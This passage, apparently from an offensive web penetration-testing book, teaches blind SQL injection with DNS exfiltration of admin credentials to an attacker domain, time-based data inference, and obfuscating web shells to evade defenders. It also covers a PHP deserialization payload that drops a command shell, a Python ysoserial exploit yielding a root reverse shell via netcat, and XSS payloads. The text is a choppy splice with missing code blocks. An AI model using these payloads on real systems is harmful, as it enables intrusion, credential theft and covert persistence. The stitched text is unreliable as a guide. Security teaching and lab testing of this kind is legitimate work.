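A lookup can be triggered from any machine on the internet with dig; the label is the same Base64 string that appears in the INetSim log below:
root@kali:~# dig +short c2FudGEgY2xhdXNlIGlzIG5vdCByZWFs.c2.spider.ml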
Since we control this DNS server responsible for the c2 zone, we can
inspect /var/log/inetsim/service.log and observe the response
sent to the dig request, using the tail command as shown:
root@spider-c2-1:~# tail
/var/log/inetsim/service.log
[...] [11033] [dns_53_tcp_udp 11035] connect
[...] [11033] [dns_53_tcp_udp 11035] recv: Query
Type A, Class IN, Name
c2FudGEgY2xhdXNlIGlzIG5vdCByZWFs.c2.spider.ml
[...] [11033] [dns_53_tcp_udp 11035] send:
c2FudGEgY2xhdXNlIGlzIG5vdCByZWFs.c2.spider.ml 3600
IN A 35.196.100.89
[...] [11033] [dns_53_tcp_udp 11035] disconnect
[...] [11033] [dns_53_tcp_udp 11035] stat: 1
qtype=A qclass=IN
qname=c2FudGEgY2xhdXNlIGlzIG5vdCByZWFs.c2.spider.m
l
root@spider-c2-1:~#
The WAITFOR DELAY payload will work for most blind SQL injections,
as the majority of application views depend on the result from SQL
queries that the controller executes.
When the backend system builds the query for execution, it will
translate into the following:
SELECT * FROM users WHERE user = 'Dade';declare @q
varchar(99);set @q='\\sqli-test-payload-
1.c2.spider.ml\test'; exec master.dbo.xp_dirtree
@q;--';
Let's go ahead and revisit the method we've used to confirm the
vulnerability in the first place. We've passed in a query that forced
the SQL server to resolve an arbitrary domain name in an attempt to
list the contents of a network share over SMB. Since we control the
DNS server that has authority over the share domain, we can
intercept any query sent to it. Confirmation was just a matter of
observing the application server attempting to resolve the domain for
the network share we passed in. To actually get the data out, we'll
have to build a query that performs these actions:
declare @q varchar(99);
Next, we will use a couple of SELECT statements to read the user field
for the first account with the admin role:
We will also select the password field for this particular user:
exec('xp_fileexist
''\\'+@q+'.c2.spider.ml\test''');--'
The confusing run of double and single quotes preceding the double
backslash is just how a single quote is escaped inside a SQL string literal.
The final payload is a bit messy but should do the trick. We will
combine all of our statements into one line, with each statement
separated by a semicolon:
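A sketch of the combined payload follows; the role column name and the dot used to join the two fields are illustrative, while the xp_fileexist call is the one shown above:
';declare @q varchar(99);set @q=(SELECT TOP 1 user+'.'+password FROM users WHERE role='admin');exec('xp_fileexist ''\\'+@q+'.c2.spider.ml\test''');--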
On the backend, the SQL query to be executed will look like the
following:
Figure 6.7: A quick search on Hashtoolkit.com for the retrieved password hash with the
value "summer17" popping up in the results
Note
Hash Toolkit lets you run searches for MD5 and SHA-* hashes to
quickly return their plaintext counterparts. The most common
passwords have already been cracked or computed by
somebody somewhere and sites like Hash Toolkit provide a quick
index for the results. As with anything on the internet, be aware
of what data you submit to an untrusted medium. Hash Toolkit is
available on https://hashtoolkit.com/.
Data inference
Let's consider a simpler scenario where the application does not
process the payload asynchronously. This is a far more common
scenario. In a blind injection, we can typically use conditional
statements in the injected query to infer data from the database. If
the preceding example vulnerability were not asynchronous, we could
introduce a significant delay in the response. Combined with a
traditional if-then-else, this lets us make inferences about the data
we are trying to retrieve.
The high-level pseudocode we'd use for this type of attack looks like
this:
[...]
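The idea, roughly:
if the first character of the password is 'a', delay the response
  -> response was slow: the password starts with 'a'
if the first two characters of the password are 'aa', delay the response
  -> response was fast: not 'aa'
if the first two characters of the password are 'ab', delay the response
  -> response was slow: the password starts with 'ab'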
We could repeatedly check for the contents of the password field for a
particular user, simply by observing the server response time. In the
preceding pseudocode, after the first three iterations, we'd be able to
infer that the password value begins with ab.
On MySQL, the BENCHMARK() function can be used to burn a measurable amount of CPU time by evaluating an expression repeatedly, in this case computing an MD5 hash five million times:
BENCHMARK(5000000,MD5(CHAR(99)))
If the number of iterations is too low, the server would return a result
quickly, making it harder to determine if the injection was successful.
We also don't want to introduce too much of a delay, as enumerating
a database could take days.
The final attack payload will combine the IF statement and the
benchmark operation. We will also use the UNION keyword to
combine the existing SELECT with our very own:
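A sketch of such a payload for a MySQL backend, reusing the users table and password column from earlier (pad the UNION with extra columns as needed to match the original SELECT):
' UNION SELECT IF(SUBSTRING(password,1,1)='a',BENCHMARK(5000000,MD5(CHAR(99))),NULL) FROM users-- -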
The backend SQL query to be executed will, once again, look like
the following:
The key takeaway here is the ability to alter the application behavior
in a way that is measurable by the attacker. Even some of the more
secure application development environments, which aggressively
filter outgoing traffic, tend to allow at least DNS UDP packets to fly
through. Filtering egress DNS queries is a difficult exercise and I
don't envy any security team charged with doing so. As attackers,
once again we are able to take full advantage of these limitations
and as I've shown in the earlier example, fully compromise the
application by exploiting a difficult-to-discover vulnerability.
This chapter will expose you to valuable tools and by the end, you
should be able to:
Extending Burp
Burp Suite is a fantastic attack proxy and it comes with some great
features straight out of the box. As mentioned in previous chapters,
Intruder is a flexible brute-forcing tool, Repeater allows us to inspect
and fine-tune attacks, and Decoder streamlines data manipulation.
What makes Burp great is the ability to expand functionality through
community-developed and community-maintained extensions.
PortSwigger, the creator of Burp Suite, also maintains an online
directory for extensions called the BApp Store. The BApp Store can
be accessed via the Extender tab in Burp Suite.
We can find Additional Scanner Checks in the BApp Store with the
Install button greyed out. The BApp Store page presents us with an
option to go and download Jython.
Figure 7.2: Burp Suite BApp Store page for Additional Scanner Checks
Note
Jython is available on http://www.jython.org/downloads.html as a
standalone JAR file.
Note
JRuby is available on http://jruby.org/download as a complete
JAR file.
Figure 7.4: The Install button is enabled after configuring environment prerequisites
Authentication and authorization
abuse
One of the most tedious application security tests is an
authentication or authorization check. The basic steps to verify this
type of vulnerability go something like this: capture a request made
with a privileged session, replay the same request with a
lower-privileged (or anonymous) session, compare the two responses,
and repeat for every request and role in the application.
Autorize will do the heavy lifting for us and we can quickly install it
through the Burp Suite interface.
Figure 7.5: Autorize in the BApp Store
Autorize can also help us find more serious vulnerabilities with the
second replayed request, which removes the Cookie header, making
it an anonymous request. If this request's response matches the
original's, an authentication bypass issue is present in the
application.
First, we need to capture the Cookie header and the session ID for a
user with low privileges. This can be captured by opening a new
browsing session and looking at the server response. We will be
traversing the application using an administrative account.
Autorize will start replaying requests once we click the enable button:
Figure 7.7: The Autorize Cookie configuration pane
It appears that while this page is hidden from regular users by a 403
error in the admin panel entry point, it is accessible directly and only
checks whether the user is logged in, and not whether they have
administrative privileges.
I've said this before but as penetration testers and red teamers, we
know time is not a luxury we share with the bad guys. Engagements
are often time-sensitive and resources are stretched thin. Copying
and pasting the Cookie header from Burp into the terminal to launch
a sqlmap attack doesn't seem like a big deal, but it adds up. What if
the target application has several potential SQL injection points?
What if you're testing three or four different applications that do not
share the same login credentials? Automation makes life easier and
makes us more efficient.
Note
The CO2 plugin can be downloaded from the BApp Store or from
GitHub at https://github.com/portswigger/co2.
Installing CO2 is as easy as any other BApp Store plugin and it adds
a few options to the context menu in the Target, Proxy, Scanner, and
other modules. Many of the requests made through Burp can be sent
directly to a few of the CO2 components. Doing so will fill in most of
the required parameters, saving us time and reducing the potential
for human error.
sqlmap helper
CO2 provides a sqlmap wrapper within the Burp user interface aptly
titled SQLMapper. If we spot a potential injection point, or perhaps
Burp's active scanner notified us of a SQL injection vulnerability, we
can send the request straight to CO2's SQLMapper component
using the context menu:
Figure 7.9: Sending the request to SQLMapper's context menu from CO2
Note
The Kali distribution comes with a fairly recent version of sqlmap
already installed, but the latest and greatest code can be cloned
from GitHub at https://github.com/sqlmapproject/sqlmap.
The Config button will allow us to point CO2 to the right binaries to
execute sqlmap from the user interface. The Run button will spawn a
new terminal with sqlmap and all of the options passed in.
Figure 7.10: CO2 SQLMap config popup
On Kali, the sqlmap tool is located in the /usr/bin folder and does
not have the .py extension. If you're working with the bleeding edge
from the GitHub repository, you may want to specify the full path.
First, we can clone the latest and greatest sqlmap code from GitHub
using the git clone command:
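root@kali:~# git clone https://github.com/sqlmapproject/sqlmap.git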
The Run button will launch a new terminal window and start sqlmap
with the selected options:
Figure 7.12: sqlmap running with the selected options
Note
sqlmap will save the session of each attack in a folder under the
home directory: ~/.sqlmap/output/[target]
root@kali:~/.sqlmap/output/c2.spider.ml# tree
.
├── log
├── session.sqlite
└── target.txt

0 directories, 3 files
root@kali:~/.sqlmap/output/c2.spider.ml#
Web shells
The CO2 Swiss Army knife also provides an easy way to generate
web shells for a number of server-side languages. If we manage to
upload a shell to one of these boxes, we need a simple, somewhat
secure shell to escalate privileges and ultimately reach our goal.
127.0.0.1,192.168.1.123
3. Click the Gen New Token button for a random token value:
To save the file somewhere on disk, click the Generate File button.
The contents of the generated shell will look like the following:
Figure 7.14: The Laudanum shell source code
We can pass this token using the laudtoken URL parameter and the
command to execute via laudcmd. Values for these parameters can
also be passed via POST.
It should be noted that even with the correct token in the URL, a
request from an unknown IP will be rejected with a 404 response.
Our client will appreciate the extra security checks; after all, we are
here to find vulnerabilities and not introduce new ones. It should go
without saying, but this is not foolproof; this file should be purged
during cleanup just like any other artifact we drop on the target.
With the proper external IP and the token in hand, we can gain
control of the shell using Burp Suite's Repeater module.
Note
PHP Obfuscator can be cloned from
https://github.com/naneau/php-obfuscator.
We can call the obfuscate tool with the obfuscate parameter, and
pass in the file to mangle, as well as the output directory:
root@kali:~/tools/phpobfs# bin/obfuscate obfuscate
~/tools/shells/ads.php ~/tools/shells/out/
Copying input directory /root/tools/shells/ads.php
to /root/tools/shells/out/
Obfuscating ads.php
root@kali:~/tools/phpobfs#
If we inspect the newly obfuscated ads.php file, we now see this blob
of code:
Some strings are still visible and we can see the IPs and token
values are still intact. The variables are changed to non-descriptive
random words, the comments are gone, and the result is really
compact. The difference in size between the two shells is also
significant:
It's not foolproof, but it should let us fly under the radar a bit longer.
PHP Obfuscator should work on all PHP code, including shells you
may choose to write yourself.
Burp Collaborator
In the previous chapter, we looked at finding obscure vulnerabilities
in applications that may not be obvious to attackers. If the application
does not flinch when we feed it unexpected input, it could be that it is
not vulnerable and the code properly validates input, but it could also
mean that a vulnerability exists but it's hidden. To identify these
types of vulnerabilities, we passed in a payload that forced the
application to connect back to our C2 server.
Note
The free version does not support Collaborator; however,
Chapter 6, Out-of-Band Exploitation, described the process and
how to build a C2 infrastructure that can be used for the same
purpose.
Note
Burp Collaborator takes several steps to ensure the data is safe.
You can read more about the whole process on
https://portswigger.net/burp/help/collaborator.
Service interaction
To see Collaborator in action, we can point the Burp Active Scanner
to a vulnerable application and wait for it to execute one of the
payloads generated, and perform a connect back to the public
Collaborator server burpcollaborator.net.
Note
The Damn Vulnerable Web Application is a good testing bed
for Collaborator: http://www.dvwa.co.uk/.
The Burp Suite client will check in periodically with the Collaborator
server to ask about any recorded connections. In the preceding
case, we can see that the application, vulnerable to command
injection, was tricked into connecting to the Collaborator cloud
instance by performing a DNS lookup on a unique domain.
Note
Once you close the Collaborator client window, the domains
generated will be invalidated and you may not be able to detect
out-of-band service interactions.
We can grab one of these domains and feed it to our custom attack.
The application accepts the request but does not respond with any
data. Our payload is a simple XSS payload designed to create an
iframe that navigates to the domain generated by the Collaborator
client.
"><iframe%20src=[collaborator-domain]/>
If the application is vulnerable, this exploit will spawn a new HTML
iframe, which will connect back to a server we control, confirming the
existence of a vulnerability.
Note
Collaborator can be a bit memory hungry and a micro-cloud
instance may not be enough for a production deployment.
Note
The first time you run the Collaborator server, it will prompt you to
enter your license in order to perform activation. This value is
stored in ~/.java/.userPrefs/burp/prefs.xml so make sure that
this file is properly protected and is not world-readable.
The Collaborator server is actually built into the Burp Suite attack
proxy. We can copy the Burp Suite Professional JAR file and launch
it from the command-line with the --collaborator-server switch:
root@spider-c2-1:~/collab# java -jar Burp
Suite_pro.jar --collaborator-server
[...]
This version of Burp requires a license key. To
continue, please paste your license key below.
VGhlcmUgYXJlIHRoZXNlIHR3byB5b3VuZyBmaXNoIHN3aW1taW
5nIGFsb25nLCBhbmQgdGhleSBoYXBwZW4gdG8gbWVldCBhbiBv
bGRlciBmaXNoIHN3aW1taW5nIHRoZSBvdGhlciB3YXksIHdoby
Bub2RzIGF0IHRoZW0gYW5kIHNheXMsICJNb3JuaW5nLCBib3lz
LCBob3cncyB0aGUgd2F0ZXI/IiBBbmQgdGhlIHR3byB5b3VuZy
BmaXNoIHN3aW0gb24gZm9yIGEgYml0LCBhbmQgdGhlbiBldmVu
dHVhbGx5IG9uZSBvZiB0aGVtIGxvb2tzIG92ZXIgYXQgdGhlIG
90aGVyIGFuZCBnb2VzLCAiV2hhdCB0aGUgaGVsbCBpcyB3YXRl
cj8i
You'll notice we had to specify the domain we'll be using along with
our public IP address. The log level is set to DEBUG until we can
confirm the server is functioning properly.
Note
It is a good idea to filter incoming traffic to these ports and
whitelist your and your target's external IPs only.
Now that the server is online, we can modify the Project options
and point to our private server, c2.spider.ml.
Figure 7.25: Private Collaborator server configuration
The SMTP and SMTPS checks may fail depending on your ISP's
firewall, but enterprise clients should be able to reach it. The
important part is the DNS configuration. If the target can resolve the
randomly generated subdomain for c2.spider.ml, they should be
able to connect outbound if no other egress filtering takes place.
You'll also notice that the enforced HTTPS connection failed as well.
This is because by default, Collaborator uses a self-signed wildcard
certificate to handle encrypted HTTP connections.
To get around this issue for targets whose trusted root certificate
authorities we don't control, we'd have to install a certificate signed
by a public certificate authority.
We've also looked at an easy way to obfuscate code that may end
up on a target system. When dropping a custom shell on a server,
it's a good idea to hide its true function. A passing blue teamer may
not look twice if the code looks overly complex. We've used tools to
quickly transform our generated backdoor into a less conspicuous
output.
Abusing deserialization
Exploiting deserialization relies on built-in methods, which execute
automatically when an object is instantiated or destroyed. PHP, for
example, provides several of these methods for every object:
__construct()
__destruct()
__toString()
__wakeup()
…and more!
Consider a simple PHP array holding a couple of configuration values:
array(
    'database' => 'users',
    'host' => '127.0.0.1'
)
When the source code is compiled and executed by the PHP engine,
the array object is stored in a memory structure somewhere in RAM
that only the processor knows how to access. If we wish to transfer
array to another machine through a medium such as HTTP, we have
to find all the bytes in memory that represent it, package them, and
send them using a GET request or similar. This is where serialization
comes into play.
The serialize() function in PHP will do just that for us: find the array
structure in memory and return a string representation of it. We can
test this by using the php binary on our Linux machine, and with the -
r switch we can ask it to serialize our array, and return a
representative string. The PHP code will echo the results
to the screen:
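root@kali:~# php -r 'echo serialize(array("database" => "users", "host" => "127.0.0.1"));'
a:2:{s:8:"database";s:5:"users";s:4:"host";s:9:"127.0.0.1";}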
The code can be a bit daunting to non-developers, but it's not very
complicated at all. The WriteLock class has two public functions (or
methods) available: write() and __wakeup(). The write() function
will write the string app_in_use to the /tmp/lockfile file on the disk
using PHP's built-in file_put_contents function. The __wakeup()
method will simply sanity-check the properties and execute the
write() function in the current object ($this). The idea here is that
the lock file, /tmp/lockfile, will automatically be created when the
WriteLock object is recreated in memory by deserialization.
First, we can see how the WriteLock object looks when it is serialized
and ready for transmission. Remember that __wakeup() will only
execute on deserialization, not when the object is instantiated.
Let's execute the serialize.php file using the php interpreter and
observe the result:
O:9:"WriteLock":2:{
s:4:"file";
s:13:"/tmp/lockfile";
s:8:"contents";
s:10:"app_in_use";
}
The first few bytes denote an object (O) instantiated from the
WriteLock class, which contains two properties, along with their
respective values and lengths. There is one thing to note: for private
class members, the names are prepended with the class name
wrapped in null bytes. If the WriteLock properties $file and
$contents were private, the serialized object would look like this:
O:9:"WriteLock":2:{
s:4:"\x00WriteLock\x00file";
s:13:"/tmp/lockfile";
s:8:"\x00WriteLock\x00contents";
s:10:"app_in_use";
}
Note
Null bytes are not normally visible in standard output. In the
preceding example, the bytes were replaced by their hex
equivalent \x00 for clarity. If our payload includes private
members, we may need to account for these bytes when
transmitting payloads over mediums that interpret null bytes as
string terminators. Typically, with HTTP we can escape null bytes
using the percent sign preceding the hex representation
of null, 00. Instead of \x00, for HTTP, we'd simply use %00.
Let's run a simple web server and bring the WriteLock application to
life. The php interpreter can function as a standalone development
server with the -S parameter, similar to Python's SimpleHTTPServer,
with the added benefit of processing .php files before serving them.
We can use the php command to listen on the local system on port
8181, as follows:
root@kali:/var/www/html/lockapp# php -S
0.0.0.0:8181
Listening on http://0.0.0.0:8181
Document root is /var/www/html/lockapp
Press Ctrl-C to quit.
The serialized payload will look like this, again indented to make it
more readable:
O:9:"WriteLock":2:{
s:4:"file";
s:31:"/var/www/html/lockapp/shell.php";
s:8:"contents";
s:100:"<?php if (md5($_GET['password']) ==
'5d58f5270ce02712e8a620a4cd7bc5d3') {
system($_GET['cmd']); } ?>";
}
Note
We've updated the value for file and contents, along with the
appropriate string length, 31 and 100 respectively, as shown in
the preceding code block. If the length specified does not match
the actual length of the property value, the attack will fail.
Our serialized data contains single quotes, which can interfere with
the execution of curl through the bash prompt. We should take care
to escape them using a backslash (\') as follows:
root@kali:~# curl -G http://0.0.0.0:8181/index.php
--data-urlencode $'lock=O:9:"WriteLock":2:
{s:4:"file";s:31:"/var/www/html/lockapp/shell.php"
;s:8:"contents";s:100:"<?php if
(md5($_GET[\'password\']) ==
\'5d58f5270ce02712e8a620a4cd7bc5d3\') {
system($_GET[\'cmd\']); } ?>";}'
Lock initiated.
Figure 8.6: The shell successfully executing the id program and displaying its result
Note
Composer can be found at https://getcomposer.org/.
Attacking custom protocols
Not unlike PHP, Java also provides the ability to flatten objects for
easy transmission or storage. Where PHP-serialized data is simple
strings, Java uses a slightly different approach. A serialized Java
object is a stream of bytes with a header and the content split into
blocks. It may not be easy to read, but it does stand out in packet
captures or proxy logs as Base64-encoded values. Since this is a
structured header, the first few bytes of the Base64 equivalent will be
the same for every stream.
Note
DeserLab and Nick Bloor's research can be found on
https://github.com/NickstaDB/.
To start a new instance of DeserLab, we can call the JAR file with
the -server parameter, and specify the IP and port to listen on. For
simplicity, we will be using deserlab.app.internal to connect to the
vulnerable application once it is up and running. We will use the java
binary to launch the DeserLab server component on the DeserLab
target machine.
Protocol analysis
DeserLab is a straightforward application that provides string
hashing services and is accessible by a custom client, built-in to the
DeserLab.jar application file. With the DeserLab server component
running on the target machine, we can launch the client component
on our attacker machine, kali, with the -client switch, as follows:
The application server component terminal log echoes the other side
of the interaction. Notice the client-server hello and name message
exchange; this will be important when we craft our exploit.
While the data may be a bit hard to read, each byte has a purpose.
We can see the familiar ac ed header and the various inputs the
client has sent, such as name and string. You'll also notice that the
string value is a serialized HashRequest object. This is a Java class
implemented by both the server and the client. Serialization is used
to instantiate an object that will calculate the hash of a given input
and store it in one of its properties. The packets we've just captured
are the serialized representation of this object being transmitted from
the client to the server and vice versa. The server-serialized object
also contains an extra property: the generated hash.
[...]
oos = new
ObjectOutputStream(clientSock.getOutputStream());
//Generate a hash
request.setHash(generateHash(request.getData()));
oos.writeObject(request);
[...]
We see that the data is read in from the client using the
ObjectInputStream (ois) object. This is just a fancy term for the data
coming in from the client, which we've observed in the Wireshark
packet capture to be the serialized HashRequest object. The next step
is to attempt to cast the data read from ois to a HashRequest data
structure. The reference to this new HashRequest object is then stored
in the request variable, which can then be used as a normal object in
memory. The server will get the input string to be hashed by
calling the request's getData() method, computing the
hash, and storing it back into the object using setHash(). The setHash
method is made available by the HashRequest class and all it does is
populate a hash property within the object. The data is then
serialized and written back to the network stream using
writeObject().
Deserialization exploit
Java deserialization attacks are possible because Java will execute
a variety of methods in its quest to deserialize an object. If we control
what properties these methods reference, we can control the
execution flow of the application. This is POP and it is a code reuse
attack similar to return-oriented programming (ROP). ROP is used
in exploit development to execute code by referencing existing bytes
in memory and taking advantage of the side effect of the x86 return
instruction.
Spring
Groovy
Commons Collections
Jython
...and many more!
Note
ysoserial's source code and JAR files can be downloaded from
https://github.com/frohoff/ysoserial.
We know that the target application uses the Groovy library because
we have access to the JAR file and its source. This isn't always true
with enterprise applications, however, and we may not always have
access to the source code during an assessment. If the vulnerable
application is running server-side and our only interaction with it is
via an HTTP GET request, we'd have to rely on a separate information
leak vulnerability to know what library to target for the POP gadget
chain generation. Of course, the alternative is to simply try each
known POP gadget chain until one succeeds. This is not as elegant
and it is very noisy, but it may do the trick.
The indented lines are the packets received from the server and
everything else is what we've sent with our client:
Once again, we can see the ac ed magic bytes starting the stream,
followed by the protocol hello packets: 0xF0 0x00 0xBA 0xAA, and
finally the protocol version 0x01 0x01. Each packet sent by either the
server or the client will be preceded by 0x77, indicating a block of
data is coming in and the length of that block (0x02 in the case of the
protocol version).
It's not terribly important that we understand what each byte means
because we can clearly see where the serialized payload begins.
The 0x73 and 0x72 bytes (which are the equivalent of the lowercase
letters s and r respectively) represent the start of the serialized
object, as shown in the following output:
To feed a custom payload and exploit the application, we will write a
Python script that connects to the DeserLab application, replays the
protocol handshake and client name exchange, and then sends the
ysoserial-generated payload in place of a legitimate serialized object.
First, we will import the Python socket library and set a couple of
variables that describe our target:
import socket
target_host = 'deserlab.app.internal'
target_port = 4321
target = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
target.connect((target_host, target_port))
At this point, our script will emulate the DeserLab client, and in order
to successfully connect and be able to send our exploit code, we
have to perform a few steps first. Recall that the client sends a few
required bytes, including the hello packet and client version.
We will use the send() and recv() methods to send and read the
responses, so that the communication can move along. Since some
bytes can be outside of the ASCII readable range, we should escape
them using their hex equivalent. Python allows us to do this using a
backslash (\) and x prefix to the hex bytes. For example, the
character A can be represented in Python (and other languages)
using \x41.
After we perform a send, we should also receive any data sent from
the server. We don't need to store the server response, but we do
have to receive it to clear the buffer and allow the socket
communication to continue.
First, we will send the 0xAC 0xED magic bytes, followed by the hello
packet, and finally the expected client version. We have to prefix the
hello and version packets with the 0x77 byte, followed immediately
by the data length. For example, the client version being 0x01 0x01
would need to be prefixed by 0x77 (indicating a data packet), and by
0x02 (the data packet length).
The following code will send the magic bytes, hello packet, and client
version:
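A sketch, using the byte values observed in the packet capture (the 0x00 0x05 stream version bytes always follow the serialization magic):
target.send("\xAC\xED\x00\x05")               # serialization magic and stream version
response = target.recv(1024)                  # clear the server's reply
target.send("\x77\x04" + "\xF0\x00\xBA\xAA")  # 0x77 data block: protocol hello
response = target.recv(1024)
target.send("\x77\x02" + "\x01\x01")          # 0x77 data block: client version
response = target.recv(1024)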
We also have to send the client name, which can be arbitrary, but it
is required. We just have to make sure the 0x77 prefix and the data
length are accurate:
Finally, we have to strip the magic bytes from the payload itself, as
we've already sent these. The server expects the object without this
data. Python allows us to remove the first four bytes using the [4:]
array notation:
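Assuming the ysoserial-generated gadget chain was saved to a file beforehand (the name here is hypothetical), the final steps look like this:
with open("payload.bin", "rb") as f:
    payload = f.read()

target.send(payload[4:])     # drop the 0xAC 0xED 0x00 0x05 header we already sent
response = target.recv(1024)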
import socket
target_host = 'deserlab.app.internal'
target_port = 4321
target = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
target.connect((target_host, target_port))
root@
spider-c2-1:~# nc -lvp 443
listening on [any] 443 ...
All that's left to do is to run the Python script on our attacker machine
and hope for the best:
gid=0(root) groups=0(root)
Summary
In this chapter, we've looked at another way that user input can be
abused to execute arbitrary code on vulnerable applications.
Serialization is very useful in modern applications, especially as they
become more complex and more distributed. Data exchange is
made easy, but sometimes at the expense of security.
In this chapter, we will explore client-side attacks, with a heavy emphasis on XSS. We will
also look at Cross-Site Request Forgery (CSRF) attacks and discuss the implications of
the same-origin policy (SOP). Next, we will look at ways to weaponize XSS
vulnerabilities using BeEF.
We will spend quite a bit of time on BeEF, as it makes XSS attacks viable. It allows us to
easily perform social engineering attacks to execute malicious native code, implement a
keylogger, persist our access, and even tunnel traffic through the victim's browser.
SOP
Consider a scenario where a target is logged into their Gmail account (mail.google.com) in
one of the open browser tabs. In another tab, they navigate to a different site, on a
different domain, which contains attacker code that wants access to that Gmail data.
Maybe they were socially engineered to visit this particular site or maybe they were
redirected there through a malicious advertising (malvertising) campaign on a well-known
news site.
The attacker code may try to open a connection to the mail.google.com domain, and
because the victim is already authenticated in the other browser tab, the code should be
able to read and send emails as well by forging requests to Gmail. JavaScript provides all
the tools necessary to accomplish all of this, so why isn't everything on fire?
The answer, as we will see in detail shortly, is because of the SOP. The SOP prevents this
exact attack and, unless the attacker can inject their code directly into mail.google.com,
they will not be able to read any of its sensitive information.
The SOP was introduced back in the Netscape days because the potential for abuse was
very real without it. Simply put, the SOP restricts sites from accessing information from
other sites, unless the origin of the request source is the same as the destination.
There is a simple algorithm to determine whether the SOP has been breached. The
browser will compare the schema, domain, and port of the source (origin) site to that of the
destination (target) site and if any one item doesn't match, read access will be denied.
In our earlier example, the target site in the attack would be the following URI:
https://mail.google.com/mail/u/0/#inbox, which translates to the origin triple (https, mail.google.com, 443).
Attacker code running on https://www.cnn.com/ would be denied read access because the
domain doesn't match: its origin triple (https, www.cnn.com, 443) agrees on the scheme and port, but not on the domain.
This makes sense from a defense perspective. The scenario we outlined earlier would be
a nightmare if not for the SOP. However, if we look closely at web apps on the internet,
we'll notice that almost all include content such as images, stylesheets, and even
JavaScript code.
Sharing resources cross-origin or cross-site has its benefits for the application. Static
content can be offloaded to CDNs, which are typically hosted on other domains (think
Facebook's fbcdn.net, for example), allowing for greater flexibility, speed, and ultimately,
cost savings while serving users.
The SOP does allow access to certain types of resources cross-origin to ensure the web
functions normally. After all, when the focus is user experience, a security policy that
makes the application unusable is not a great security policy, no matter how secure it may
actually be.
The SOP will permit the following types of cross-origin objects to be embedded into the
origin from any other site:
Images
Stylesheets
Scripts (which the browser will gladly execute!)
Inline frames (iframe)
We can include images from our CDN, and the browser will download the image bytes and
render them onto the screen. We cannot, however, read the bytes programmatically using
JavaScript. The same goes for other static content that is allowed by the SOP. We can, for
example, include a stylesheet with JavaScript, but we cannot read the actual contents of
the stylesheet if the origin does not match.
This is true for iframe elements as well. We can create a new iframe object and point it to
an arbitrary URL, and the browser will gladly load the content. We cannot, however, read
the contents if we are in breach of the SOP.
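A quick experiment from the browser console illustrates both cases (the URLs are placeholders):
// Same-origin frame: same schema, domain, and port as the parent page
var frame = document.createElement('iframe');
frame.src = '/some-local-page.html';
document.body.append(frame);
// Once the frame loads, reading its contents succeeds:
// frame.contentDocument.head

// Cross-origin frame: it renders, but programmatic access is blocked
var bing = document.createElement('iframe');
bing.src = 'https://www.bing.com/';
document.body.append(bing);
// bing.contentDocument is null (or access throws a SecurityError)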
We can see that the frame source (frame.src) matches the parent origin triple exactly and
when we try to read the contents of the iframe element's head
using frame.contentDocument, we succeed. The SOP was not violated.
Figure 9.2: Creating a cross-origin frame and attempting to access its contents fails
The Bing search app loaded just fine, as we can see in the rendered site on the right, but
programmatically, we cannot read the contents because that violates the SOP.
JavaScript is also accessible cross-origin and this is usually a good thing. Offloading your
JavaScript libraries to a CDN can reduce load times and bandwidth usage. CDNJS is a
prime example of how sites can benefit from including JavaScript from a third-party.
Note
CDNJS is an open-source web CDN providing almost every conceivable JavaScript
library. More information on this great service can be found at https://cdnjs.com/.
Any other type of data that we may try to load cross-origin using JavaScript would be
denied. This includes fonts, JSON, XML, or HTML.
Cookies deserve a special mention when talking about the SOP. Cookies are typically tied
to either the domain or a parent domain, and can be restricted to secure HTTP
connections. Browsers can also be instructed to disallow JavaScript access to certain
cookies, to prevent attacks such as XSS from extracting session information.
The cookie policy is fine-tuned by the application server when the cookie is initially set,
using the Set-Cookie HTTP response header. As I said earlier, unless otherwise specified,
cookies are typically bound to the application domain name. Wildcard domains can also be
used, which would instruct the browser to pass the cookies for requests to all subdomains
as well.
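A response header combining these options might look like this (the values are illustrative; HttpOnly is the flag that blocks JavaScript access):
Set-Cookie: session=0d6c7531e68cfe45d0a9f4e92f3b2b22; Domain=.ecorp.local; Path=/; Secure; HttpOnly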
Applications will leverage cookies to manage authentication and user sessions. A unique
value will be sent to the client once they've successfully logged in, and the browser will
pass this value back to the application for all subsequent requests, provided the domain
and path match what was specified when the cookie was initially set.
The side effect of this behavior is that a user only has to login to the application once and
the browser will maintain the authenticated session by passing cookies in the background
with every request. This greatly improves user experience but can also be abused by
attackers.
Cross-origin resource sharing
In the age of microservices, where web application components are
decoupled and run as separate instances on totally different
domains, the SOP presents some challenges.
Note
CORS is well-documented on the Mozilla Developer Network:
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
We can see the CORS response headers a public API, such as Spotify's, returns by querying it with curl:
root@spider-c2-1:~# curl -I https://api.spotify.com/v1/albums
HTTP/2 401
www-authenticate: Bearer realm="spotify"
content-type: application/json
content-length: 74
access-control-allow-origin: *
access-control-allow-headers: Accept,
Authorization, Origin, Content-Type, Retry-After
access-control-allow-methods: GET, POST, OPTIONS,
PUT, DELETE, PATCH
access-control-allow-credentials: true
access-control-max-age: 604800
via: 1.1 google
alt-svc: clear
root@spider-c2-1:~#
This particular API is public and, therefore, will inform the client that
all origins are allowed to read response contents. This is done with
the value for Access-Control-Allow-Origin set to a wildcard: *.
Private APIs will typically use a more specific value, such as an
expected URL.
Cross-Site Scripting
While this may not sound as great as executing code on the actual
application server, XSS attacks can be devastating when used in
targeted attacks.
Reflected XSS
The more common type of XSS vulnerability is the reflected or non-
persistent kind. A reflected XSS attack happens when the
application accepts input from the user, either via parameters in the
URL, body, or HTTP headers, and it returns it back to the user
without sanitizing it first. This type of attack is referred to as non-
persistent because once the user navigates away from the
vulnerable page, or they close the browser, the exploit is over.
Reflected XSS attacks typically require some social engineering due
to the ephemeral nature of the payload.
Note
To showcase XSS attacks, we will once again use the badguys
project from Mike Pirnat. The web application code can be
downloaded from https://github.com/mpirnat/lets-be-bad-guys.
The application will take the user-inputted value and pre-fill a text
field somewhere on the page. This is common behavior for login
forms, where the user may enter the wrong password and the page
will reload to display an error message. In an attempt to improve
user experience, the application automatically fills the username field
with the previously inputted value. If the username value is not
sanitized, bad things can happen.
Consider what happens when the following XSS polyglot is submitted as the username:
jaVasCript:/*-/*'/*\'/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
The alert box pops up after the polyglot inserts an <svg> tag with the
onload property set to execute alert(). This is possible because the
application reflected the payload without removing dangerous
